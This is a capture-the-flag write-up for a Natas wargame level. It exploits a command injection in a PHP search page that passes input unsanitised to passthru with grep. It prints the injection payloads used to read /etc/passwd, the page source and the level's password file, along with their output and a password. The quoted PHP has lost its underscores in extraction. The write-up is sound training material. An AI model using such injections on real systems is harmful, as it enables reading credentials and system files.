Natas - Level 10

2 November 2017

Connection information

Information given

The white box is composed of three parts:

  1. The first part is an input box with the label Find words containing:
  2. The second is a button named Search
  3. The last is a link View sourcecode pointing to

Getting the password

Here is the interesting part of the server source code:

Find words containing: <input name=needle><input type=submit name=submit value=Search><
,→ br><br>
$key = "";
if(array key exists("needle", $ REQUEST)) {
$key = $ REQUEST["needle"];
if($key != "") {
passthru("grep −i $key dictionary.txt");

We can take a look at the file dictionary.txt stored here

It is just a number of words in alphabetic order. Now what’s interesting is that we can do some injection. If we submit ; echo we will see the output


Poking with injections

Using ; cat /etc/passwd #

natas31:x:30031:30031:natas level 31:/home/natas31:/bin/bash
natas32:x:30032:30032:natas level 32:/home/natas32:/bin/bash
natas33:x:30033:30033:natas level 33:/home/natas33:/bin/bash
natas17:x:30017:30017:natas level 17:/home/natas17:/bin/bash

Use ; cat index.php # to see some page inception (and rediscover the password for natas9).


Remember in level 8, we had a hint:

<!−− hint: password for webuser natas8 is in /etc/natas webpass/natas8 −−>

If we try to display /etc/natas webpass/natas10, we get the password nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

; cat /etc/natas webpass/natas10